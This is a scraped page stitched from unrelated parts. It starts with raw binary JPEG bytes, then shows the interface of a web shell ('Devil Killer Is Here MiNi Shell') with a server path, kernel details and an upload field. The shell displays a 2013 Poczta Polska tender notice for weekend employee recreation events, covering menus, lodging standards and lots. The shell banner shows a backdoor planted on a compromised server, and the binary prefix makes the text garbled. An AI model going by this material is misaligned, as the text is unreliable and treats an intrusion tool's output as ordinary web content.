JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130429/171672-N-2013.html

<p class="kh_header"><b>Poznań: Organizacja rekreacyjnych imprez weekendowych dla pracowników Poczty Polskiej SA i członków ich rodzin</b><br>
<b>Numer ogłoszenia: 171672 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Poczta Polska Spółka Akcyjna"  ul. Stawki 2, 00-940 Warszawa, Centrum Infrastruktury Region Infrastruktury w Poznaniu , ul. Głogowska 17, 60-943 Poznań, woj. wielkopolskie, tel. 61/8697011, faks 61/8697134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja rekreacyjnych imprez weekendowych dla pracowników Poczty Polskiej SA i członków ich rodzin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja weekendowych imprez rekreacyjnych dla pracowników Poczty Polskiej S.A. i członków ich rodzin.
Opis przedmiotu zamówienia 
1. Wykonawca zobowiązany jest w ramach każdej z imprez do:
1 zapewnienia uczestnikom programu rekreacyjnego, 
2 zapewnienia miejsca i sprzętu niezbędnego do zrealizowania programu rekreacyjnego, 
3 zakwaterowania uczestników w jednym obiekcie w pokojach 1, 2, 3, 4 osobowych lub maksymalnie 6 - osobowych domkach z pełnym węzłem sanitarnym o określonym poniżej standardzie:
- łazienka, ubikacja wyposażone w wannę z baterią i natryskiem lub kabinę prysznicową, osłonę natrysku, umywalkę z blatem lub półką umiejscowioną nad umywalką, lustro, pojemnik na śmieci, dozownik mydła płynnego, suszarkę do rąk lub ręczniki papierowe, wieszaki ścienne, gniazdo elektryczne, zimna i ciepła woda przez całą dobę,
Uwaga:
mydło, papier toaletowy i ręczniki papierowe - uzupełniane na bieżąco,
- każdy pokój, domek wyposażony w lóżko, łóżka, szafę na garderobę z co najmniej 2 wieszakami na okrycia wierzchnie, biurko lub stół oraz krzesła po 1 na osobę, minimum 1 lampę sufitową, kosz na śmieci 
- wszystkie pomieszczenia ogrzewane - w przypadku niekorzystnych warunków atmosferycznych,
4 umożliwienia dojazdu do obiektu,
5 zapewnienia zewnętrznego oświetlenia obiektu,
6 zapewnienia bezpłatnych miejsc parkingowych dla uczestników przez cały czas trwania imprezy w pobliżu tj. maksymalnie do 500 m od miejsca zakwaterowania W przypadku imprezy w Skorzęcinie zapis otrzyma brzmienie: zapewnienia bezpłatnego wjazdu oraz bezpłatnych miejsc parkingowych dla uczestników przez cały czas trwania imprezy w pobliżu tj. maksymalnie do 500 m od miejsca zakwaterowania na terenie Ośrodka Wypoczynkowego w Skorzęcinie, 
7 zapewnienia wyżywienia dla wszystkich uczestników: 
- dwie kolacje, dwa śniadania i dwa obiady - mają to być świeże i przygotowywane na miejscu, w czystych warunkach posiłki - zgodnie z poniższymi wymaganiami:
Menu - porcja dla jednej osoby
PIĄTEK
KOLACJA:
Dania na gorąco:
- Pierwsze danie: porcja mięsa  min. 150 g 3 rodzaje do wyboru, dodatki typu: ziemniaki, frytki, kluski, ryż, makaron itp. min. 150 g, zestaw surówek min. 120 g - wg propozycji Wykonawcy
- Drugie danie: strogonow, leczo, bigos  min. 300 g - wg propozycji Wykonawcy
- Trzecie danie: barszcz czerwony min. 250 ml + krokiet min. 100 g
Dania na zimno: 
- 1 Danie rybne  min. 130 g - wg propozycji Wykonawcy
- 2 galarciki po min.100 g - wg propozycji Wykonawcy
- 2 rodzaje sałatek po min. 250 g - wg propozycji Wykonawcy
- zestaw wędlin 3 rodzaje po min 50 g - wg propozycji Wykonawcy
- pomidory i ogórki min. 100 g
Pozostałe:
- ciasto min. 200 g - wg propozycji Wykonawcy
- kawa, herbata - wg zapotrzebowania
- dodatki typu cukier, cytryna, śmietanka, mleko - wg zapotrzebowania,
- pieczywo, masło - wg zapotrzebowania 
- zimne napoje woda mineralna i soki min. 500 ml
SOBOTA
ŚNIADANIE:
- parówki min. 2 szt po 50 g,
- płatki śniadaniowe - wg zapotrzebowania
- mleko -  wg zapotrzebowania
- wędliny różne min. 80 g - wg propozycji Wykonawcy
- gzik ze szczypiorkiem min. 130g
- pomidory, ogórki min. 80 g 
- dżem - wg zapotrzebowania
- kawa, herbata - wg zapotrzebowania 
- dodatki typu cukier, cytryna - wg zapotrzebowania
- pieczywo, masło - wg zapotrzebowania 
OBIAD:
- zupa min. 300 ml  - wg propozycji Wykonawcy 
- sztuka mięsa min.150 g  - wg propozycji Wykonawcy 
- ziemniaki, frytki, kluski, ryż, makaron itp. min. 200 g - wg propozycji Wykonawcy
- surówka min. 150 g - wg propozycji Wykonawcy
- napój  min. 250 ml - wg propozycji Wykonawcy
- podwieczorek ciasto min. 100 g - wg propozycji Wykonawcy 
KOLACJA:
- kiełbasa min.150 g 
- karkówka min. 150 g
- żurek w chlebie min. 250 g
- sałatka min. 100 g - wg propozycji Wykonawcy
- pieczywo - wg zapotrzebowania
- ketchup i musztarda - wg zapotrzebowania
- smalec ze skwarkami - wg zapotrzebowania
- ogórek kiszony min. 50 g
- kawa, herbata - wg zapotrzebowania; 
- zimne napoje woda mineralna i soki min. 500 ml
- dodatki typu cukier, cytryna, śmietanka, mleko - wg zapotrzebowania
NIEDZIELA
ŚNIADANIE:
- jajko gotowane min.2 szt. 
- wędliny różne min. 80 g 
- ser żółty min. 80 g 
- pomidory, ogórki min. 80 g
- płatki śniadaniowe  - wg zapotrzebowania
- dżem  - wg zapotrzebowania 
- masło  - wg zapotrzebowania 
- pieczywo  - wg zapotrzebowania 
- mleko - wg zapotrzebowania 
- kawa, herbata  - wg zapotrzebowania 
- dodatki typu cukier, cytryna - wg zapotrzebowania
OBIAD:
- zupa min. 300 ml - wg propozycji Wykonawcy 
- sztuka mięsa min.150 g - wg propozycji Wykonawcy 
- ziemniaki, frytki, kluski, ryż, makaron itp. min. 200 g - wg propozycji Wykonawcy
- surówka min. 150 g - wg propozycji Wykonawcy
- napój  min. 250 ml - wg propozycji Wykonawcy
- deser min. 100 g -wg propozycji Wykonawcy 
8 zapewnienia pomieszczenia typu stołówka, restauracja lub innego zadaszonego pomieszczenia z miejscami siedzącymi, umożliwiającego wydanie posiłku jednorazowo wszystkim uczestnikom oraz zorganizowanie zabawy tanecznej;
9 zapewnienia stołów i ławek lub krzeseł dla wszystkich uczestników,
10 wydawania wszystkich posiłków w naczyniach porcelanowych wraz ze sztućcami, 
Uwaga:
- dopuszcza się wydawanie posiłków i napojów przy grillu i, lub ognisku w naczyniach jednorazowych,
- podane powyżej gramatury stanowią ilości minimalne, w przypadku dań podawanych na gorąco podana została gramatura po obróbce cieplnej.
11 zorganizowania ogniska i, lub grilla wieczorem w sobotę, 
12 zapewnienia odpowiedniej obsługi niezbędnej do realizacji przedmiotu umowy tj.:
- koordynatora imprezy animatorów - osób z ramienia Wykonawcy dbających o uczestników i realizację programu,
- obsługi gastronomicznej i hotelowej
13 zapewnienia opłaty klimatycznej jeżeli jest wymagana,
14 zorganizowania w piątek wieczorem imprezy tanecznej przy muzyce wraz z zapewnieniem nagłośnienia i oświetlenia terenu oraz obsługi muzycznej. 
Uwaga:
Wykonawca ponosi ewentualne koszty związane z opłaceniem tantiem na rzecz organizacji zbiorowego zarządzania prawami autorskimi i pokrewnymi.
2. Ramowy program imprezy:
Piątek:
- ok. godz. 17.00 - 19.30 - przyjazd i zakwaterowanie uczestników, 
- ok. godz. 20.00 do min. godz. 2:00 - kolacja wraz zabawą taneczną przy muzyce, 
Uwaga:
Pierwsze danie na gorąco zostanie wydane ok. godziny 20:00, natomiast pozostałe dania na gorąco będą wydawane ok. godziny 22:00 oraz ok. godziny 1:00. Dania na zimno oraz napoje będą dostępne przez cały czas trwania kolacji.
Sobota: 
- ok. godz. 9.00 - śniadanie, 
- ok. godz. 10.30 do ok. 13:00 - realizacja programu rekreacyjnego część I
- ok. godz. 13:30 - obiad,
- ok. godz. 14.30 do ok. 19:00 - realizacja programu rekreacyjnego część II
- ok. godz. 20.00 - kolacja z grillem i, lub ogniskiem 
 Niedziela:
- ok. godz. 9.00 - śniadanie, 
- ok. godz. 10:00 - 13.00 realizacja programu rekreacyjnego 
- ok. godz. 13.30 - obiad,
- ok. godz. 14.30 - wykwaterowanie i wyjazd.

Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników każdej imprezy maksymalnie o 10 osób. W przypadku skorzystania z tego prawa Wykonawcy nie przysługują jakiekolwiek roszczenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać się zrealizowaniem, co najmniej 2 usług polegających na organizacji imprez rekreacyjnych o wartości co najmniej 20 000,00 zł każda dla minimum 80 osób</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać się dysponowaniem:
a. w części nr 1, 2 i 3 - ośrodkiem z bazą noclegową oraz żywieniową dla minimum 100 osób zgodnie z opisem zawartym w lit. c
b. w części nr 4 i 5 - ośrodkiem z bazą noclegową oraz żywieniową dla minimum 80 osób zgodnie z opisem zawartym w lit. c
c. Opis bazy noclegowej oraz żywieniowej:
1. pokoje 1, 2, 3, 4 osobowe lub maksymalnie 6 - osobowe domki z pełnym węzłem sanitarnym o określonym poniżej standardzie:
- łazienka, ubikacja wyposażone w wannę z baterią i natryskiem lub kabinę prysznicową, osłonę natrysku, umywalkę z blatem lub półką umiejscowioną nad umywalką, lustro, pojemnik na śmieci, dozownik mydła płynnego, suszarkę do rąk lub ręczniki papierowe, wieszaki ścienne, gniazdo elektryczne, zimna i ciepła woda przez całą dobę,
- każdy pokój, domek wyposażony w lóżko, łóżka, szafę na garderobę z co najmniej 2 wieszakami na okrycia wierzchnie, biurko lub stół oraz krzesła po 1 na osobę, minimum 1 lampę sufitową, kosz na śmieci; 
- wszystkie pomieszczenia ogrzewane - w przypadku niekorzystnych warunków atmosferycznych,
2. umożliwiony dojazd do obiektu,
3. zapewnione zewnętrzne oświetlenie obiektu,
4. zapewnione bezpłatne miejsca parkingowe dla uczestników przez cały czas trwania imprezy w pobliżu tj. maksymalnie do 500 m od miejsca zakwaterowania, 
5. zapewnione pomieszczenie typu stołówka, restauracja lub inne zadaszone pomieszczenie z miejscami siedzącymi, umożliwiające wydanie posiłku jednorazowo wszystkim uczestnikom oraz zorganizowanie zabawy tanecznej
6. zapewnione stoły i ławki lub krzesła dla wszystkich uczestników.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - atrakcyjność programu rekreacyjnego - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska Spółka Akcyjna
Centrum Infrastruktury Region Infrastruktury w Poznaniu
ul. Głogowska 17, 60-943 Poznań
p. 128.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2013 godzina 09:45, miejsce: Poczta Polska Spółka Akcyjna Centrum Infrastruktury Region Infrastruktury w Poznaniu
SEKRETARIAT 
ul. Głogowska 17, 60-943 Poznań
pok. nr 115.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja rekreacyjnych imprez weekendowych dla pracowników Poczty Polskiej SA i członków ich rodzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja 4 weekendowych imprez rekreacyjnych w miejscowości Mierzyn dla pracowników Poczty Polskiej S.A. i członków ich rodzin.
W każdej imprezie uczestniczyć będzie maksymalnie 100 osób. 
Termin realizacji zamówienia: 
Od 21 czerwca 2013 r. do 29 września 2013 r. - weekendy od piątku ok. godz. 17:00 do niedzieli ok. godz. 14:30.
Zamawiający wymaga wskazania przez Wykonawcę terminów rozpoczęcia realizacji imprezy:
- 2 imprez w miesiącu czerwcu 
- 2 imprez w miesiącu wrześniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. atrakcyjność programu rekreacyjnego - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja rekreacyjnych imprez weekendowych dla pracowników Poczty Polskiej SA i członków ich rodzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja 8 weekendowych imprez rekreacyjnych w miejscowości Skorzęcin dla pracowników Poczty Polskiej S.A. i członków ich rodzin.
W każdej imprezie uczestniczyć będzie maksymalnie 100 osób. 

Termin realizacji zamówienia: 
Od 21 czerwca 2013 r. do 29 września 2013 r. - weekendy od piątku ok. godz. 17:00 do niedzieli ok. godz. 14:30.
Zamawiający wymaga wskazania przez Wykonawcę terminów rozpoczęcia realizacji imprezy:
- 2 imprez w miesiącu czerwcu, 
- 4 imprez w miesiącu sierpniu 
- 2 imprez w miesiącu wrześniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja rekreacyjnych imprez weekendowych dla pracowników Poczty Polskiej SA i członków ich rodzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja 3 weekendowych imprez rekreacyjnych w miejscowości Karpicko dla pracowników Poczty Polskiej S.A. i członków ich rodzin.
W każdej imprezie uczestniczyć będzie maksymalnie 100 osób.
Termin realizacji zamówienia: 
Od 21 czerwca 2013 r. do 29 września 2013 r. - weekendy od piątku ok. godz. 17:00 do niedzieli ok. godz. 14:30.
Zamawiający wymaga wskazania przez Wykonawcę terminów rozpoczęcia realizacji imprezy:
- 1 imprezy w miesiącu czerwcu
- 2 imprez w miesiącu lipcu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. atrakcyjność programu rekreacyjnego - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Organizacja rekreacyjnych imprez weekendowych dla pracowników Poczty Polskiej SA i członków ich rodzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja 1 weekendowej imprezy rekreacyjnej w miejscowości Jastrowie dla pracowników Poczty Polskiej S.A. i członków ich rodzin.
W imprezie uczestniczyć będzie maksymalnie 80 osób. 
Termin realizacji zamówienia: 
Od 21 czerwca 2013 r. do 29 września 2013 r. - weekendy od piątku ok. godz. 17:00 do niedzieli ok. godz. 14:30.
Zamawiający wymaga wskazania przez Wykonawcę terminu rozpoczęcia realizacji 1 imprezy w miesiącu wrzesień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. atrakcyjność programu rekreacyjnego - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Organizacja rekreacyjnych imprez weekendowych dla pracowników Poczty Polskiej SA i członków ich rodzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja 1 weekendowej imprezy rekreacyjnej w miejscowości Ostrzeszów dla pracowników Poczty Polskiej S.A. i członków ich rodzin.
W imprezie uczestniczyć będzie maksymalnie 80 osób. 
Termin realizacji zamówienia: 
Od 21 czerwca 2013 r. do 29 września 2013 r. - weekendy od piątku ok. godz. 17:00 do niedzieli ok. godz. 14:30.
